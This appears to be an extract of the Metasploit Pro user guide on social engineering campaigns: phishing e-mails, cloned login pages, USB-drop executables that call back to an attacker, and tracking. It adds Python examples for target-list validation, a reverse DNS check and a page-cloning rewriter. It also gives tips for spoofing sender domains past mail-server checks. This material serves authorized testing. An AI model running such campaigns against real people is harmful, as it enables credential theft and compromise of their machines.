E-mail component - Defines the content that you want to send in the e-mail body and the human targets that you want to receive the e-mail. You can provide a link to the web page that serves the exploit.
Web page component (optional) - Sets the web page component to send a client-side exploit and defines the tracking URL and the HTML content for the web page.
To set up a file format exploit in Metasploit Pro, the campaign contains the following components:
E-mail component - Attaches a file format exploit to the e-mail and defines the content that you want to send in the e-mail body and the human targets that you want to receive the e-mail.
Portable file component - Generates a file format exploit that you can store on a USB key.
Portable Files
A portable file can be used for a USB drive drop. A portable file can be a generated executable file or a file format exploit that you load onto a USB key. When a human target inserts the USB drive and opens the file, a connection is created from the target's machine to the attacking machine. To create a portable file in Metasploit Pro, you need to create a campaign that contains the following component:
Portable file component - Generates an executable or file format exploit that you can store on a USB key.
Campaign - A logical grouping of components that you need to perform a social engineering attack.
Campaign component - A building block for a social engineering campaign. A campaign component can be an e-mail, a web page, or a portable file.
Template - A reusable HTML shell containing boilerplate that is useful to make available across campaigns. Create and use a template to quickly generate web page or e-mail content for a campaign.
Target list - A list that defines the recipients and their e-mail addresses that will receive an e-mail. The campaign sends the social engineering attack to the target list. Use CSV formatting to create a target list. The CSV file must include the following header row: email_address, first_name, last_name.
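The target list format specified above (a CSV file whose header row is email_address, first_name, last_name) is easy to get wrong, and a malformed list is better caught before it is attached to a campaign. The following Python validator is an added example, not code from Metasploit Pro or this guide. It checks the header row (tolerating the spaces after the commas that appear in the guide's own header example), requires exactly three fields per row, applies a simple syntactic e-mail check (the regular expression is this example's own assumption, not the product's rule), and rejects duplicate addresses. The `SAMPLE_CSV` rows are constructed for the example.

```python
import csv
import io
import re

# Header row required by the guide for a Metasploit Pro target list.
REQUIRED_HEADER = ["email_address", "first_name", "last_name"]

# Syntactic check only (assumption made for this example): one '@', no
# whitespace, and at least one dot in the domain part.
_EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

# Constructed sample target list; the addresses are not real recipients.
SAMPLE_CSV = """\
email_address, first_name, last_name
alice@example.com, Alice, Smith
bob@example.com,Bob,Jones
not-an-address, Carol, White
alice@example.com, Alice, Smith
"""


def validate_target_list(text):
    """Validate a target list CSV.

    Returns (targets, errors): targets is a list of dicts keyed by the header
    names for every accepted row; errors is a list of human-readable problems.
    A bad header stops validation, because without it no row can be trusted.
    """
    rows = list(csv.reader(io.StringIO(text)))
    if not rows:
        return [], ["target list is empty"]

    header = [h.strip().lower() for h in rows[0]]
    if header != REQUIRED_HEADER:
        return [], [
            "header row must be %s, got %s"
            % (", ".join(REQUIRED_HEADER), ", ".join(h.strip() for h in rows[0]))
        ]

    targets, errors, seen = [], [], set()
    # Line numbers are 1-based and count the header as line 1.
    for lineno, raw in enumerate(rows[1:], start=2):
        row = [c.strip() for c in raw]
        if not any(row):
            continue  # blank line, ignore
        if len(row) != 3:
            errors.append(f"line {lineno}: expected 3 fields, got {len(row)}")
            continue
        email, first, last = row
        if not _EMAIL_RE.match(email):
            errors.append(f"line {lineno}: invalid e-mail address {email!r}")
            continue
        key = email.lower()
        if key in seen:
            errors.append(f"line {lineno}: duplicate address {email}")
            continue
        seen.add(key)
        targets.append(dict(zip(REQUIRED_HEADER, (email, first, last))))
    return targets, errors


if __name__ == "__main__":
    accepted, problems = validate_target_list(SAMPLE_CSV)
    print(f"{len(accepted)} valid target(s), {len(problems)} problem(s)")
    for p in problems:
        print(" -", p)
```

Run the validator over a list before importing it; a clean result means every recipient is syntactically addressable and appears once, which avoids bounced or duplicated messages that skew the campaign's click statistics.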
Browser Autopwn
Browser Autopwn is a module that fingerprints HTTP clients and enables you to automatically exploit them based on their browser type. When you run Browser Autopwn, a web server starts on your local system, loads the applicable browser exploits, and serves a malicious site. When a victim visits the site, the module automatically launches the applicable exploits against the victim's machine until one successfully compromises the system; a Meterpreter session then starts and enables you to access the victim's machine.
Campaign
A campaign is a logical grouping of components that you need to perform a social engineering attack. A campaign can contain only one e-mail component, but can have multiple web pages or portable files.
Click Tracking
Click tracking is a method of client-side testing that tracks the number of human targets that click on a link. To implement click tracking, you need to set up a web page to which you direct a human target. The web page tracks the number of visits and helps an organization identify how susceptible their infrastructure is to a real attack.
E-mail Template
An e-mail template contains predefined HTML content that you can insert into an e-mail.
Executable
An executable file that automatically runs when a human target opens the file. The executable runs a payload that creates a connection from the exploited machine back to the attacking machine.
Human Target
A human target is the person who receives the social engineering attack or is part of a campaign.
Phishing Attack
A phishing attack is a form of social engineering that attempts to acquire sensitive information, such as user names, passwords, and credit card information, from a human target. During a phishing attack, a human target receives a bogus e-mail disguised as an authentic e-mail from a trusted source, like the bank. Generally, the e-mail contains a link that opens a fake web page that looks nearly identical to the official site. The style, logo, and other images may appear exactly as they are on the real website.
Portable File
A generated executable file that you can attach to an e-mail or save to a USB key. When the victim opens the file, the executable runs the payload, starts a session on the victim's machine, and connects back to your machine.
Resource File
A resource file refers to a web page template, e-mail template, or target list. It is a reusable file that you can use in a campaign. Each project has its own set of resource files. The resource files are not shareable between projects.
Social Engineering
Social engineering is an attack method that uses a delivery mechanism, such as e-mail or a USB key, to either trick a victim into providing sensitive information or compromise their machine by means of an exploit.
Target List
A target list defines the targets that you want to include in the social engineering campaign. You use the target list to specify the recipients that you want to e-mail the social engineering attack.
Tracking GIF
A tracking GIF sets a browser cookie when a human target opens an e-mail.
Tracking Link
A tracking link consists of a URL path to a web page and a tracking string. When a target clicks on the URL, the system sets a cookie to track the visit and any subsequent visits.
Tracking String
A tracking string is a 64-bit string that encodes the target and e-mail IDs. Campaigns use tracking strings to monitor the activity of a target.
Visit
A visit occurs when a target clicks on a link and opens the web page.
Web Template
A web template contains predefined HTML content that you can insert into a web page.
Tracking Link
Campaign Dashboard
The Campaign Dashboard contains the interfaces and tools that you need to set up social engineering campaigns. It provides you with access to the campaigns, target lists, and resource files that are in a project. The Campaign Dashboard is made up of the campaign tasks bar, modal windows, campaign widgets, and action links.
Configure a Campaign - Displays the campaign editor. Use the campaign editor to create new campaigns and edit existing campaigns.
Manage Campaigns - Shows a list of campaigns that are currently in the project. Next to each campaign listing is a set of action links. Use these action links to edit, delete, reset, preview, and start/stop a campaign.
Manage Reusable Resources - Provides a management interface for reusable campaign resources, such as e-mail templates, web page templates, target lists, and malicious files.
Campaign Widgets
A campaign widget is an icon that represents a campaign component. When you click on the campaign widget, it opens a modal window that displays the configuration form for that campaign component.
Modal Windows
A modal window is a small pop-up window that requires you to interact with it before you can go back to the main window. Typically, modal windows are used to display alerts and confirmation windows. In Metasploit Pro, modal windows guide you through the process of setting up campaign components. To exit a modal window, you must either complete the required form data, or you can click the X to exit the screen.
Action Links
An action link is an interactive link that you can click on to perform a specific task. Each campaign has a set of action links that are available for you to use. The following action links are available to each campaign:
Preview - Generate a preview of an e-mail and web page.
Reset - Reset the statistics and data in a campaign.
Edit - Edit the current configuration for campaign components.
Delete - Remove the campaign and its data from the project.
The following image shows the action links that are available for a campaign:
Action Links
Campaigns
A campaign is a logical grouping of the campaign components that you need to exploit or phish a group of people. A campaign can consist of the following campaign components: e-mail, web page, or portable file. The components that you add to the campaign depend on the purpose and goal of the social engineering attack.
Campaign Restrictions
The following restrictions apply to campaigns:
A campaign can only contain one e-mail.
A campaign that you build with the canned phishing campaign can only contain one e-mail and up to two web pages. One web page is used for the landing page, and the other web page is used for the redirect page. If you need additional redirect pages, do not use the canned phishing campaign to create a campaign; use the custom campaign builder instead.
Each instance of Metasploit Pro can only run one campaign at a time.
Metasploit Pro does not serve images or asset files locally. If you manually create a web page, you must define fully qualified URLs.
Campaign States
A campaign state describes the current status of a campaign. At any given point in time, a campaign can be in one of the following states:
Unconfigured - The campaign does not contain any components.
Preparing - The campaign is getting ready to run.
Launchable - The campaign is ready to start.
Running - The campaign is online. For campaigns that have a web page, this means that the web page is online and accessible to target machines that can reach the Metasploit instance. For campaigns that contain an e-mail, this means that Metasploit Pro has attempted to send the e-mail to the target list through your mail server. For campaigns that contain portable files, this means that the handler is ready and waiting for incoming connections from target machines.
For campaigns that have a web page, this means that the web page is no longer accessible and cannot be viewed by anyone. For campaigns that contain portable files, this means that the handler is no longer listening for incoming connections.
Campaign Management
A campaign is a grouping of components that you need to set up a social engineering attack. You create campaigns to configure and manage campaign components, such as e-mails, web pages, and portable files.
Creating a Campaign
1. From within a project, select Campaigns from the Tasks menu. The Manage Campaigns area appears.
2. Click the Configure a Campaign tab.
3. When the Configure a Campaign area appears, enter a name for the campaign in the Name field.
4. Choose one of the following setup options:
Phishing Campaign - Metasploit Pro automatically creates a campaign that has the necessary campaign components for a phishing attack. The canned phishing campaign contains an e-mail component and two web page components that you configure to set up the landing page and the redirect page.
Custom Campaign - You manually create the campaign and add the campaign components that you need to it. A custom campaign can contain any combination of campaign components.
Now you're ready to customize the campaign. If the campaign is empty, you will need to add a component to it. For example, if you want to generate an executable to save to a USB key, you can add a portable file component.
Running a Campaign
1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign that you want to run. The campaign status must be launchable for the campaign to run. A launchable status indicates that all necessary components of the campaign are configured.
3. Click the Start link.
2. When the Manage Campaigns area appears, find the campaign that you want to reset.
4. When the confirmation window appears, click OK to confirm that you want to reset the data in the campaign.
2. When the Manage Campaigns area appears, find the campaign that you want to edit and click the Edit link.
3. When the campaign configuration page appears, click the Add e-mail, web page, or portable file button. You can only add components to a campaign that uses the custom setup. You cannot add components to a campaign that you created with the canned phishing campaign.
4. Click on the campaign component that you want to add. After you add the component, the configuration page for the component appears. Follow the onscreen instructions to configure the component.
Stopping a Campaign
1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign that you want to stop.
3. Click the Stop link.
Deleting a Campaign
1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign that you want to delete.
3. Click the Delete button.
4. When the confirmation window appears, click OK to confirm that you want to permanently delete the campaign. All target lists and campaign components will be deleted from the project. You will no longer be able to view, run, or edit the campaign.
5. Click the Export Data button.
6. When the Open window appears, choose the Save File option and click OK. The file saves to the Downloads folder on your system.
Campaign Components
In a social engineering attack, there is typically a delivery tool and an attack method. To configure a delivery tool and attack method for a social engineering attack, you use campaign components. A campaign component refers to an e-mail, web page, or portable file. It is a configurable component that you use to build a social engineering campaign. Each campaign must have at least one campaign component. Most campaigns will have an e-mail component because it is the most commonly used delivery method for social engineering. In addition to the e-mail component, you can add web pages to build phishing scams or add portable files to create file attachment attacks. For example, you can set up a phishing attack with an e-mail component and a web page component. The e-mail component defines the header and content that you want to e-mail to a target list, and the web page component sets up the landing and redirect pages that the target visits.
E-mail
E-mail is the delivery tool that you use to send social engineering attacks to your target list. An e-mail defines the header and the content that you want the victim to read. To send e-mail, you must provide Metasploit Pro with the SMTP settings for your local mail server or a cloud-based mail delivery service. Metasploit Pro does not include a built-in mail transfer agent; you must have access to your own mail server. If you intend to reuse the e-mail content in other campaigns, you can create an e-mail template that predefines the content for the e-mail body. An e-mail template enables you to quickly insert content into an e-mail without having to recreate the content each time you create a campaign. After you create the e-mail template, you will be able to apply it to an e-mail in any campaign within the project. Tip: As a general best practice, you should create the e-mail component after you create a web page component. Some features that you may need access to, such as web page links, may not be available if you create the e-mail first.
E-mail Options
The following options are available for you to configure for the e-mail component:
Name - The name of the e-mail component. The name displays on the campaign component tab.
Subject - The subject that displays in the message header and the subject line.
From Address - The sender's e-mail address or the display name.
From Name - The sender's name.
Target List - The list of targets, or recipients, that you want to receive the e-mail.
The mail server does not perform reverse DNS lookup to verify that the IP address of the server hosting Metasploit Pro matches the domain of the e-mail address that you are trying to spoof. If the mail server performs reverse DNS lookup, the server will reject the e-mail and refuse to deliver it.
The mail server does not perform restrictive checks for spam, malicious files, or any type of e-mail abuse. Basically, the mail server should use the lowest levels of protection against spam and junk mail. For example, publicly available e-mail services like Gmail, Yahoo, and Hotmail enforce extremely high levels of security and will most likely blacklist any e-mail that appears to be spam. Due to these restrictions, it is recommended that you do not use these types of e-mail services.
If the mail server is provided through an e-mail relay service, check the terms of service for spam or bandwidth restrictions. Many of these providers will track your account to ensure that you are not using it to abuse their services. If any of your e-mail recipients flag your e-mail as spam, this will alert the provider that you may be abusing their system and may cause them to blacklist your e-mail. Some relay service providers may require that you take the time to build a reputation as a legitimate e-mail sender; otherwise, many Internet Service Providers will immediately begin to flag your e-mail as spam. Since volume is typically a strong indicator of spam, you should keep the number of outgoing e-mails below the relay service's recommended volume.
The SMTP port used to send mail is not blocked by the server running Metasploit Pro.
No Valid Recipients
This error indicates that the domain you are trying to spoof does not match the originating IP address in a reverse DNS lookup. To work around this issue:
You can disable reverse DNS lookup on the mail server.
You can set up a proxy or IP address that enables the phishing e-mail to act as if it were coming from a legitimate origin.
You can lower your mail server's security level for unknown and untrusted senders, and you can lower your mail server's security level for spam.
You can use an e-mail relay service, such as Sendgrid, JangoSMTP, or Mandrill. These services give their users the ability to configure the level of security that is enforced on outgoing mail and the ability to send bulk mail. Additionally, these e-mail relay services are more likely to deliver e-mail reliably. However, before you decide to use an e-mail relay service, please check the terms of service agreement to verify that the provider will not blacklist your e-mails if they are classified as spam.
Sender E-mail Address Does Not Match with the User Account
This error most likely results from a reverse DNS lookup that determined that the IP address of the e-mail did not match the host name that it is trying to spoof. To work around this issue:
You can disable reverse DNS lookup.
You can set up a proxy or IP address that enables the phishing e-mail to act as if it were coming from a legitimate origin.
You can set up a local SMTP server on the server that runs Metasploit Pro. On Linux machines, you can use Sendmail or Postfix.
You can use an e-mail relay service, such as Sendgrid, JangoSMTP, or Mandrill.
Sender e-mail address does not match with the user account.
The server refused our mail.
No valid recipients.
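The reverse DNS mismatch behind these errors is easiest to understand from the receiving server's side. The following is an added example, not code from Metasploit Pro or from this guide, of the forward-confirmed reverse DNS (FCrDNS) check that a receiving mail server applies to the connecting IP and the sender's domain. The PTR and A tables are constructed for the example (documentation-range addresses, invented host names); a real server would issue DNS queries instead.

```python
import ipaddress
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample DNS data for the example; not real hosts or records.
PTR_RECORDS: Dict[str, str] = {
    "198.51.100.23": "mail.testlab.example.",
}
A_RECORDS: Dict[str, List[str]] = {
    "mail.testlab.example": ["198.51.100.23"],
    "mail.corp.example": ["203.0.113.10"],
}


def lookup_ptr(ip: str) -> Optional[str]:
    """Stand-in for a PTR query, answered from the constructed table."""
    return PTR_RECORDS.get(ip)


def lookup_a(host: str) -> List[str]:
    """Stand-in for an A query, answered from the constructed table."""
    return A_RECORDS.get(host.rstrip(".").lower(), [])


def check_sender(
    connecting_ip: str,
    mail_from: str,
    ptr_lookup: Callable[[str], Optional[str]] = lookup_ptr,
    a_lookup: Callable[[str], List[str]] = lookup_a,
) -> Tuple[bool, str]:
    """Forward-confirmed reverse DNS check of the kind a receiving mail server
    applies: the connecting IP must have a PTR record, that host name must
    resolve back to the same IP, and the host name must lie inside the
    sender's domain.  Returns (accepted, reason)."""
    # Normalise the address and reject anything that is not an IP literal.
    connecting_ip = str(ipaddress.ip_address(connecting_ip))
    if "@" not in mail_from:
        return False, "sender address has no domain part"
    domain = mail_from.rsplit("@", 1)[1].strip().lower().rstrip(".")

    ptr = ptr_lookup(connecting_ip)
    if ptr is None:
        return False, f"no PTR record for {connecting_ip}"
    ptr = ptr.rstrip(".").lower()

    # Forward confirmation: the PTR name must resolve back to the same IP,
    # otherwise anyone controlling a reverse zone could claim any name.
    if connecting_ip not in a_lookup(ptr):
        return False, f"PTR name {ptr} does not resolve back to {connecting_ip}"

    # The confirmed host name must be the sender domain or a host within it.
    if ptr != domain and not ptr.endswith("." + domain):
        return False, f"PTR name {ptr} is outside sender domain {domain}"
    return True, f"{connecting_ip} is {ptr}, consistent with {domain}"


if __name__ == "__main__":
    print(check_sender("198.51.100.23", "hr@testlab.example"))
    print(check_sender("198.51.100.23", "hr@corp.example"))
    print(check_sender("203.0.113.10", "it@corp.example"))
```

The second and third calls fail for exactly the two reasons the guide lists: the spoofed domain is not the one the connecting address resolves to, or the address has no usable reverse record at all. Seen from the defending side, this check is what keeps spoofed mail out of your users' inboxes, so a mail server that accepts arbitrary From domains from an unrelated IP is itself a finding worth reporting.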
Address - The fully qualified mail server address (e.g., mail.domain.com).
Port - The port that the mail server runs on. Typically, SMTP runs on port 25.
Domain - The hosted domain name for your mail server (e.g., domain.com).
Username - The user name that the system uses to authenticate to the mail server.
Password - The password that the system uses to authenticate to the mail server.
Authentication - The authentication type determines the level of security and the login mechanism that is used to connect to the SMTP server.
Host - The fully qualified mail server address (e.g., mail.domain.com).
Port - The port that SMTP runs on. Typically, SMTP runs on port 25.
Domain - The hosted domain name for your mail server (e.g., domain.com).
Username - The user name that the system uses to authenticate to the mail server.
Password - The password that the system uses to authenticate to the mail server.
Creating an E-mail
1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, open an existing campaign or configure a new campaign. Verify that the campaign uses the Custom setup.
3. Click the Add e-mail, web page, or portable file button.
4. Click the E-mail button.
5. When the e-mail configuration window appears, enter the following header information:
Subject - The subject that displays in the message header and the subject line.
From Address - The sender's e-mail address.
From Name - The sender's name.
6. Click the Target list dropdown and choose a target list.
7. Click Next to continue to the E-mail Content window.
8. When the E-mail Content window appears, you need to create the body for the e-mail. Choose one of the following options:
Insert content from a template - Click the Template dropdown menu and choose the template that you want to apply.
Create your own content - Use the plain text or rich text editor to create the e-mail body. You can insert any of the custom attributes to auto-fill the e-mail with data from the target list. For example, you can use the first_name attribute to insert the human target's first name in the e-mail.
9. Click Save to save the e-mail component. At any time, you can click on the Preview tab to see a generated preview of the current e-mail.
Web Page
A web page is an HTML page that a human target can access online. The web page can be an online form that solicits information, or it can be a simple message telling the target that they should not have opened the link. It can also be a web page that serves an exploit or file to a human target.
To design a web page, you must create the HTML code for the web page. You can create the HTML body of a web page by manually writing the HTML code or by cloning an existing web page. The easiest and recommended way to create a web page is to clone one. For example, if you want to create a spoofed website based on your company's web page, you can clone it to make a copy of the web page for your campaign. Metasploit Pro copies the HTML to the campaign, which you can edit if there are any tweaks that you want to make to the web page. The web page is assigned a URL, which is based on the web server that you configure for the campaign. This is the URL that you send to the human targets. If you plan to reuse the web page in other campaigns, you can create a web page template. A web page template contains predefined and preformatted HTML content that you can use to quickly create a web page. After you create the web page template, you will be able to apply it to a web page in any campaign within the project.
Name - The name of the web page component.
Path - The URL path to the web page.
Attack Type - The social engineering attack type that the web page launches, such as a phishing attack or file format exploit.
Content - The HTML content for the web page.
Template - Wraps the content you define in the campaign text editor with a template you have previously created.
Clone Website - Clones the web page content from a website.
Strip JavaScript - Removes JavaScript tags from the cloned HTML and prevents any scripts from running URL checking code or redirecting the human target to the real site.
Set referer - Sets the HTTP Referer header on the outgoing request for the cloned web page. Use this option if you want to use a page that checks referers or if you want to appear to the site administrator as a user that browsed to the website (e.g., http://www.company.com/home).
Set user agent - Sets the User-Agent header on the outgoing request for the cloned web page. Use this option if you want to get a targeted version of a website or if you want your request to appear to come from a normal browser.
Resolve relative URLs - Resolves any relative URLs to absolute URLs in the cloned HTML. Since Metasploit Pro does not serve assets or images locally, links to images and files must be absolute URLs. If you clone a website, you should enable this option so that the URLs resolve to valid links and render properly on the web page.
2. When the Manage Campaigns area appears, open an existing campaign or configure a new campaign. Verify that the campaign uses the Custom setup.
3. Click the Add e-mail, web page, or portable file button.
5. When the Web Page configuration page appears, add the web page name to the URL path. This completes the URL path name. For example, if your domain is http://www.mycompany.com and your web page name is support, then the complete URL is http://www.mycompany.com/support.
6. In the Name field, enter a name for the web page component. This name displays under the web page button on the campaign configuration page.
7. Click the Attack Type dropdown and choose a social engineering attack method.
8. If the web page is part of a phishing attack, you will need to choose a redirect page. Choose one of the following options to select the redirect page:
Redirect to URL - Redirects the human target to a real web page. For example, you can redirect the human target back to the company's website or intranet.
Campaign Redirect Page - Uses the redirect page that you create as part of the campaign. The redirect page must already exist for you to choose this option.
9. Click the Next button to continue to the Web Page Content window.
10. When the Web Page Content window appears, choose one of the following options to add HTML to the web page:
Apply a web page template - To apply a web page template, click the Template dropdown and choose the template that you want to apply to the web page. When you apply a template, Metasploit Pro uses the predefined content to create the web page.
Create custom HTML - To create a custom web page, use the content editor to write the HTML for the web page.
Clone an existing website - This is the recommended method. To clone a website, click the Clone Website button. When the Clone Website modal window appears, enter the web page that you want to clone. The web page that you want to clone must contain a web form. For example, web pages that have login fields or prompt the user for sensitive information are good web pages to clone.
11. When you finish adding the web page content, click the Save button to save the web page component.
2. When the Manage Campaigns area appears, open an existing campaign or configure a new campaign. Verify that the campaign uses the Custom setup.
5. When the Web Page configuration page appears, add the web page name to the URL path. This completes the URL path name. For example, if your domain is http://www.mycompany.com and your web page name is support, then the complete URL is http://www.mycompany.com/support.
6. In the Name field, enter a name for the web page component. This name displays under the web page button on the campaign configuration page.
7. Click the Attack Type dropdown and choose a social engineering attack method.
9. Click the Next button to continue to the Web Page Content window.
10. When the Web Page Content window appears, click the Clone Website button.
11. Enter the URL of the web page that you want to clone in the URL to clone field.
12. Choose any of the following options to customize the cloned web page:
Strip JavaScript - Removes JavaScript tags from the cloned HTML and prevents any scripts from running URL checking code or redirecting the human target to the real site.
Set referer - Sets the HTTP Referer header on the outgoing request for the cloned web page. Use this option if you want to use a page that checks referers or if you want to appear to the site's administrator as a user that browsed to the website (e.g., http://www.company.com/home).
Set user agent - Sets the User-Agent header on the outgoing request for the cloned web page. Use this option if you want to get a targeted version of a website or if you want your request to appear to come from a normal browser.
Resolve relative URLs - Resolves any relative URLs to absolute URLs in the cloned HTML. This option is selected by default.
13. Click the Clone button. Metasploit Pro copies the HTML from the web page and displays it in the Content window.
14. Click the Save button to save the web page component.
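To make the Strip JavaScript and Resolve relative URLs options concrete, here is an added example, not code from Metasploit Pro or from this guide, that applies both transformations to a small constructed page (the page, its base URL and the host names are invented for the example). It shows what the cloned HTML in the Content window looks like after the options run, and why an asset-bearing page still points at the original site.

```python
from html import escape
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urljoin

# Attributes that carry URLs and are rewritten to absolute form.
URL_ATTRS = {"href", "src", "action", "poster"}
# Values that are not relative paths and must be left untouched.
LEAVE_ALONE = ("#", "javascript:", "data:", "mailto:", "tel:")


class CloneRewriter(HTMLParser):
    """Re-emits HTML with relative URLs resolved against base_url and,
    when strip_js is set, <script> blocks and on* handler attributes removed."""

    def __init__(self, base_url: str, strip_js: bool = True) -> None:
        super().__init__(convert_charrefs=False)  # keep entities as written
        self.base_url = base_url
        self.strip_js = strip_js
        self.out: List[str] = []
        self._in_script = 0  # >0 while inside a <script> that is being dropped

    def _attrs(self, attrs: List[Tuple[str, Optional[str]]]) -> str:
        parts = []
        for name, value in attrs:
            if self.strip_js and name.lower().startswith("on"):
                continue  # inline event handler: dropped along with scripts
            if value is None:
                parts.append(name)
                continue
            if name.lower() in URL_ATTRS and not value.lower().startswith(LEAVE_ALONE):
                value = urljoin(self.base_url, value)  # relative -> absolute
            parts.append(f'{name}="{escape(value, quote=True)}"')
        return (" " + " ".join(parts)) if parts else ""

    def handle_starttag(self, tag, attrs):
        if self.strip_js and tag == "script":
            self._in_script += 1
            return
        if not self._in_script:
            self.out.append(f"<{tag}{self._attrs(attrs)}>")

    def handle_startendtag(self, tag, attrs):
        if not self._in_script and not (self.strip_js and tag == "script"):
            self.out.append(f"<{tag}{self._attrs(attrs)}/>")

    def handle_endtag(self, tag):
        if self.strip_js and tag == "script":
            self._in_script = max(0, self._in_script - 1)
            return
        if not self._in_script:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._in_script:
            self.out.append(data)

    def handle_entityref(self, name):
        if not self._in_script:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self._in_script:
            self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def rewrite_cloned_html(html: str, base_url: str, strip_js: bool = True) -> str:
    """Return the page with URLs absolutised and, optionally, scripts removed."""
    rewriter = CloneRewriter(base_url, strip_js)
    rewriter.feed(html)
    rewriter.close()
    return "".join(rewriter.out)


# Constructed sample page (invented site) covering the cases the options affect.
SAMPLE_HTML = """<!DOCTYPE html><html><head><title>Portal Login</title>
<script src="/js/check_referer.js"></script>
<link rel="stylesheet" href="css/site.css"></head>
<body onload="init()"><img src="../img/logo.png" alt="logo">
<form action="/login" method="post"><input name="user"><input type="submit"></form>
<a href="https://other.example/help">Help &amp; FAQ</a></body></html>"""
BASE_URL = "https://www.mycompany.example/portal/login"

if __name__ == "__main__":
    print(rewrite_cloned_html(SAMPLE_HTML, BASE_URL))
```

Two things are worth noticing in the output. The referer-checking script and the inline onload handler are gone, which is what stops a cloned page from bouncing the visitor back to the real site. Every stylesheet, image and form action now points at the original host, because the campaign web server serves only the HTML; from the defending side, that means the original site's access logs still record the asset requests that a cloned copy generates, which is one of the simplest ways to spot such a copy in the wild.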
Redirect Pages
A redirect page is the web page that you forward the human target to after they submit data on a phishing site. A redirect page can be a simple web page that displays a warning message to the human target, or it can redirect the human target to another web form. For example, the redirect page can display a security warning like "This was a social engineering test. Please do not open any e-mails from sources that you do not trust." Additionally, a redirect page can be a web page that delivers an exploit, runs Browser Autopwn, or serves a Java signed applet to the human target. If you intend to use a redirect page in your campaign, you must create it before you create the landing page that the human target initially visits. If you do not create the redirect page first, you will not be able to set a redirect page for the landing page. To create a redirect page, you use the same steps as you would to create a regular web page.
Portable File
A portable file refers to an executable file or file format exploit that you can save to an external storage device. You create portable files when you want to send a malicious file to a human target using a delivery method other than e-mail. Portable files are most commonly used in USB key drops, but you can also save them to CD-ROMs or any other storage device. A portable file is a campaign component and is created as part of a campaign. The portable file component generates a downloadable file that contains an embedded payload. The delivered payload establishes the connection between the victim's machine and the attacking machine.
Name - The name of the USB key component.
Listener Callback IP - The IP address that the attacking machine uses to listen for a connection.
Listener Callback Port - The port that the attacking machine uses to listen for a connection.
Payload Type - The type of payload that the executable file delivers to the target.
Filename - The name for the executable file that Metasploit Pro creates.
2. When the Manage Campaigns page appears, click the Configure a Campaign tab.
3. In the Name field, enter a descriptive name for the campaign. For example, USB-PayrollEXE helps you quickly identify the campaign type and the executable file name.
4. Select the Custom Campaign setup.
5. Click the Add e-mail, web page, portable file button. A set of buttons for campaign components appears.
7. When the Portable File configuration window appears, enter the following information:
Component name - The name of the campaign component. This name displays under the portable file button on the campaign configuration page.
File name - The name of the file that Metasploit Pro generates for you. The file name should include the file extension. If you do not supply the correct extension for the file, the exploit will not run on the target's machine.
Executable file - Metasploit Pro generates an executable file that delivers the generic payload handler (exploit/multi/handler) to the human target. No further action is needed if you choose to generate an executable file. Click Save to save the component configuration and to exit the configuration window.
File format exploit - Metasploit Pro generates a malicious file for you to deliver the exploit to the human target. If you choose to generate a file format exploit, the Module Search page will appear. You will need to search for the module that you want to use and configure the settings for the exploit. Save the module configuration and the portable file component configuration when you are done.
Target Lists
A target list defines the targets that you want to send the social engineering e-mail to. You can either manually create the target list from within a campaign or you can import a CSV of targets. A target list is project specific and is only accessible to the campaigns that are part of the project.
4. When the Upload Target List page appears, enter a name for the target list in the List Name field.
5. Under the Manually Add Targets area, enter the e-mail, first name, and last name of the human target that you want to add.
6. Click the Add (+) button to continue to add additional human targets.
7. When you are done, click the Save button.
5. Click the Delete button.
6. Click OK to confirm that you want to delete the target list.
Templates
A template is a preformatted and reusable set of content you can apply to an e-mail or web page. It is essentially a wrapper that wraps around the web page or e-mail content. You can use a template to instantly add content or formatting to a web page or e-mail. A template is project specific and cannot be accessed globally.
Web Templates
A web template defines optional pre-existing HTML code that you can use to wrap around the content of a web page component. Typically, a web template defines stylistic design elements and generic information that you can tailor to a specific target when you build the actual web page. The purpose of a web template is to provide reusable presentation logic that you can share between campaigns that are part of the same project. For example, if you intend to use a spoofed version of your company's web page for the majority of your campaigns, you should create a web template of your company's site. This enables you to quickly build a web page based on an existing template and customize the web page according to your needs.
6. When you create the HTML, you need to make sure that the web page includes the <html> tag to indicate the start of the web page and the </html> tag to denote the end of the web page. By default, the web template includes the <head> element.
7. Additionally, you need to define the title for the web page. By default, the title is Metasploit Pro Social Engineering Web Page. To replace the title with your own, find the <title> element and replace the text inside it with the title of your web page.
8. When you are ready to create the body of the web page, find the <body> element. The majority of the information for the web page will be defined in the <body> element. For example, you can define the background color and web page text.
9. When you are ready to insert the content from the web page component into the template, click the Insert Custom Attribute dropdown and select the Web Page Content attribute. This adds the {{ web_page_content }} tag, which denotes that the content from the web page component should be placed there.
10. When you finish creating the web template, click the Save button.
3. From the campaign configuration page, add a web page component to the campaign.
4. When the web page configuration page appears, click the Web Page button.
5. When the web page configuration page appears, add the web page ID to the URL path.
6. In the Name field, enter a name for the web page component. This name displays under the web page button on the campaign configuration page.
7. Click the Attack Type dropdown and choose a social engineering attack method.
8. If the web page is part of a phishing attack, you will need to choose a redirect page. Choose one of the following options to select the redirect page:
Redirect to URL - Redirects the human target to a real web page. For example, you can redirect the human target back to the company's website or intranet.
Campaign Redirect Page - Uses the redirect page that you create as part of the campaign. The redirect page must already exist for you to choose this option.
9. Click the Next button to continue to the Web Page Content window.
10. When the Web Page Content window appears, click the Template dropdown and choose the web template that you want to apply to the web page.
11. Click the Save button to save the web page.
E-mail Templates
An e-mail template defines a message or the HTML code that you can insert into an e-mail. An e-mail template contains optional HTML code that you can use to wrap the content of individual e-mail components. You should create an e-mail template for content that you want to reuse between campaigns that are within the same project, such as logos, banners, and footers. For example, you can create an e-mail template that contains a message that tells a victim to update their account information. The template content can contain a message like the following: "This is a friendly reminder to update your account passwords."
Or if you have a footer or logo that you want to reuse across multiple e-mails, you can create an e-mail template that contains the footer or banner information. So, when you create the e-mail, you can simply apply the e-mail template in order to insert the logos and banners that you need.
